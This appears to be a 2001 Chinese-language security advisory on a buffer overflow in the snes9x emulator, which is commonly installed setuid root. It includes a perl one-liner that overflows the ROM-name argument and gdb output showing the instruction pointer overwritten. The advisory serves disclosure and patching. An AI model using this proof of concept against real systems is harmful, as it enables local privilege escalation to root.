Snes9x 存在缓冲溢出漏洞发布时间:2001-10-17 更新时间:2001-10-17 严重程度:高 威胁程度:权限提升 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 snes9x v1.37 之前等版本详细描述 snes9x模拟器中存在缓冲溢出,当对提供超长的ROM名字作为参数提交,可以导致 程序崩溃,在多数系统中以SETUID ROOT属性安装。 测试代码 bash-2.05$ ./snes9x `perl -e 'print "A" x 85;print "B" x 4004;'` Rate: 22050, Buffer size: 2048, 16-bit: yes, Stereo: yes, Encoded: no Segmentation fault (core dumped) bash-2.05$ gdb -core=snes9x.core GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-unknown-freebsd". Core was generated by `snes9x'. Program terminated with signal 11, Segmentation fault. #0 0x42424141 in ?? () (gdb) info all eax 0x0 0 ecx 0x282e3401 674116609 edx 0x1 1 ebx 0xbfbfab7c -1077957764 esp 0xbfbfab4c 0xbfbfab4c ebp 0xbfbfab7a 0xbfbfab7a esi 0xbfbfcb7c -1077949572 edi 0xbfbfbb7c -1077953668 eip 0x42424141 0x42424141 ( == BBAA) eflags 0x10282 66178 cs 0x1f 31 ss 0x2f 47 ds 0x2f 47 es 0x2f 47 fs 0x2f 47 gs 0x2f 47 (gdb) 解决方案 下载最新的程序: http://www.snes9x.com 相关信息 Niels Heinen (zilli0n@gmx.net) |
